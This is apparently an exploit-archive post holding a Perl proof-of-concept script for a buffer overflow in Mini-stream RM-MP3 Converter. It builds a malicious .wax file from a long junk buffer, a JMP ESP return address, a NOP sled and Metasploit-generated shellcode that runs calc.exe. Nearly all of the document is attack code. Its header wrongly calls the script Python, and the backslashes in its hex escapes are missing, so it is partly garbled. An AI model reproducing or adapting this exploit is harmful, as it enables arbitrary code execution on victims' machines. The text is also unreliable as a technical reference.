Home / os / wins2003

Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) Buffer Overflow

Posted on 29 October 2014

# Title : Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) Buffer Overflow
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Date : 28.10.2014
# Python : V 2.7
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others

my $file = "exploit.wax"; #dont change file name if change file name you must change $filepath
my $junk = "x41" x 43516;
my $eip = "xC3x9cxC8x75"; #75C89CC3 JMP ESP | bad char: x09x0a
my $oyala = "x90" x 100;

#tested on my windows 7 ultimate for file name "exploit.wax" if its not true path your windows you can change it for you
my $filepath = "x01x00x00x00x00x00x00x00". # 
.......
 "xCAx84xB2x75x4Cx00x31x00". # Ê„²uD.2.
 "x22x00x00x00x43x3Ax5Cx55". # "...C:U
 "x73x65x72x73x5Cx61x64x6D". # sersadm
 "x69x6Ex5Cx44x65x73x6Bx74". # inDeskt
 "x6Fx70x5Cx65x78x70x6Cx6F". # opexplo
 "x69x74x2Ex77x61x78x00x00"; # it.wax..

#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | ruby msfencode -e x86/alpha_upper -t c
my $shellcode = "x89xe5xd9xc2xd9x75xf4x5dx55x59x49x49x49x49x43".
 "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34".
 "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41".
 "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58".
 "x50x38x41x43x4ax4ax49x4bx4cx4bx58x4bx39x43x30".
 "x45x50x43x30x45x30x4cx49x5ax45x56x51x49x42x52".
 "x44x4cx4bx50x52x56x50x4cx4bx51x42x54x4cx4cx4b".
 "x56x32x54x54x4cx4bx52x52x56x48x54x4fx4fx47x50".
 "x4ax56x46x56x51x4bx4fx56x51x49x50x4ex4cx47x4c".
 "x43x51x43x4cx54x42x56x4cx47x50x4fx31x58x4fx54".
 "x4dx43x31x49x57x4bx52x4cx30x56x32x50x57x4cx4b".
 "x56x32x52x30x4cx4bx51x52x47x4cx43x31x58x50x4c".
 "x4bx51x50x43x48x4bx35x4fx30x54x34x51x5ax43x31".
 "x4ex30x56x30x4cx4bx51x58x45x48x4cx4bx56x38x47".
 "x50x43x31x49x43x5ax43x47x4cx47x39x4cx4bx56x54".
 "x4cx4bx43x31x49x46x50x31x4bx4fx50x31x4fx30x4e".
 "x4cx4fx31x58x4fx54x4dx45x51x58x47x50x38x4dx30".
 "x54x35x4cx34x45x53x43x4dx4bx48x47x4bx43x4dx51".
 "x34x52x55x4dx32x50x58x4cx4bx50x58x51x34x45x51".
 "x49x43x52x46x4cx4bx54x4cx50x4bx4cx4bx56x38x45".
 "x4cx43x31x4ex33x4cx4bx43x34x4cx4bx45x51x58x50".
 "x4dx59x50x44x47x54x51x34x51x4bx51x4bx45x31x56".
 "x39x50x5ax56x31x4bx4fx4bx50x51x48x51x4fx50x5a".
 "x4cx4bx45x42x5ax4bx4dx56x51x4dx52x4ax45x51x4c".
 "x4dx4bx35x4fx49x43x30x45x50x43x30x56x30x45x38".
 "x56x51x4cx4bx52x4fx4cx47x4bx4fx4ex35x4fx4bx4b".
 "x4ex54x4ex50x32x5ax4ax45x38x49x36x4dx45x4fx4d".
 "x4dx4dx4bx4fx4ex35x47x4cx45x56x43x4cx45x5ax4d".
 "x50x4bx4bx4bx50x54x35x54x45x4fx4bx50x47x54x53".
 "x52x52x52x4fx43x5ax45x50x56x33x4bx4fx49x45x43".
 "x53x45x31x52x4cx43x53x56x4ex45x35x54x38x45x35".
 "x45x50x41x41";

open ($FILE, ">$file");
print $FILE "$junk.$eip.$oyala.$shellcode.$filepath";
close ($FILE);

 

TOP